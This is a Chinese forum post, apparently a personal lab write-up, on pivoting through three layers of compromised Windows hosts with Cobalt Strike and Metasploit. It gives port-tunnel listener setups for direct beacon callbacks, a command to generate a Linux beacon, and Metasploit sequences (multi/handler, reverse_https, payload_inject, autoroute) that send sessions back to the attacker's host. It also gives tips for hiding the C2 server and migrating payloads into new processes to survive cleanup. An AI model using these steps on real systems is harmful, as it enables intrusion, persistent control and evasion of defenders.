本帖最后由 CDxiaodong 于 2022-1-5 21:49 编辑
单线上线和linux上线和msf.cs派生会话稳定版
环境 kali:192.168.59.143 第一层:win12 卡1:192.168.59.180 卡2:10.10.1.133 第二层 win12 卡1:10.10.1.135 卡2:10.10.10.138 第三层 win16 卡1:10.10.10.135 层与层之间都可以互ping 先上线192.168.59.180 c2服务器的监听器要这样配置c2端口和bind端口要一致 file://E:\typora%E5%9B%BE%E7%89%87\image-20220103182436116.png?lastModify=1641207102 file://E:\typora%E5%9B%BE%E7%89%87\image-20220103162649462.png?lastModify=1641207102 然后传一个隧道到这个机器上去进行流量转发 file://E:\typora%E5%9B%BE%E7%89%87\image-20220103163721839.png?lastModify=1641207102 file://E:\typora%E5%9B%BE%E7%89%87\image-20220103182227864.png?lastModify=1641207102 10.10.1.133的4562端口就是我们需要创建的监听器端口 映射到192.168.59.143:1234就是我们的c2服务器的端口(需配置绑定地192.168.59.180.因为180这个网卡才能ping192.168.59.143) 隧道这样配置 cs创建一个监听器 file://E:\typora%E5%9B%BE%E7%89%87\image-20220103182553307.png?lastModify=1641207102 ip就是我们靶机的第二个网卡。c2端口就是我们porttunnel映射的端口.bind端口不用填 ok 做一个beacon上传到第二个靶机上面 ok 成功上线 也是没中间流量的单线上线 接下来做第三层 也是上一个流量转发器给第二个受害机 portunnel配置如下 映射地址就是上一个机器的porttunnel的对外地址 cs创建的监听器就是这个porttunnel的对外地址 放到第三层dc即可上线。但是我这台机器域权限太低。就不上线了 总结一下单线上线的好处: 好处就是这种流量转发不会经过各个机器 而是c2服务器与受害机的直接转发、上线之后即使你的一台机器被发现了被人删了之后。你的其他机器就不会受到影响 不像中转链接。一个被删了这一条线都得完 原理: 可以发现一个是内网的监听器。但是实际上我们都知道这个内网的监听器设置出来后不可能自动给内网开启这个端口。所以它利用的就是我们搭建的隧道。也就是为什么我们的流量不会经过肉鸡 后来学习补充: 后来发现上述情况我们的主c2监听器不填bind也可以上线 这是因为如果不填的话bind端口会自动默认跟c2端口一样。而且我们在肉鸡上端口转发的目的其实是c2监听器的bind端口。而不是c2端口。所以其实我们c2服务器上的bind端口和c2端口不一样也可以。隧道始终连的是bind端口就行 。所以说即使我们无论几层隧道监听都可以填bind。只要隧道开到那个bind就行 linux上线利用cs2配合cs4.0到从kali到linux 在c2窗口下打开cmd命令 输入 genc2win.exe genc2win.exe 192.168.0.105 50050 .cobaltstrike.beacon_keys null Linux x64 aaa 将文件传入linux 然后./aaa执行 即可上线 msf.cs派生会话稳定版(https协议)先cs派生给msf use exploit/multi/handler set payload windows/meterpreter/reverse_https set lhoat 192.168.59.143 set lport 1234 cs 派生给监听器192.168.59.143 即可 msf派生给cs use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_https set Lhost 192.168.59.143 set Lport 4567 set DisablePayloadhandler true set session 1 run
恍然大悟的地方: c2服务器可以放在我们的内网里。这样别人就ping不到.发现了也封不了我们的ip 但是有个缺点。就是怕cs自身的后门和漏洞。毕竟我们的cs都是盗版。那就有两个改进方法。 1.我们的内网自身安全且不放重要信息。用虚拟机换ip开个新的内网如192.168.44.x和我们的192.168.x.x不在同一网段,且机器也用虚拟机且不放重要文件就行,但这样在攻防中的话cs被搞到虽然影响没那么大。但是我们渗透的机器也可能被人发现 2.cs买正版且魔改或者自己魔改。 网上那些reverse_tcp基本上都复现不了。因为他们是cs3.14的用法。cs4以上可以使用https或者http udp。 meterpreter run -j即可后台运行 当然运行完然后bg也行 为什么要cs和msf互传? 1.cs对域的渗透且图像化拓扑图有他的优点。就是说cs属于大局渗透 msf对端口服务啥的渗透还有各种漏洞利用,攻击方式精且广且大。适合单点攻击。 所以cs和msf配合使用 2.msf有着cs没有的功能---注入新进程,也就是进程迁移。将载荷植入新进程 而cs只有进程注入--只能植入现有进程 cs转入msf后注入新进程这样就能提高存活率。cs和msf任何一台攻击没杀对另一台没有影响
metepreter中set advance可以查看改变协议攻击方式 如set disablepayload true 等 meterpreter进入后。先增加路由 run autoroute 或者 route 等于增加网卡 让肉鸡暴露外网 metepreter中输入指令run然后按三下tab键可以进入 后渗透载荷指令模式(就是增加路由这些权限维持。继续攻击的功能)
|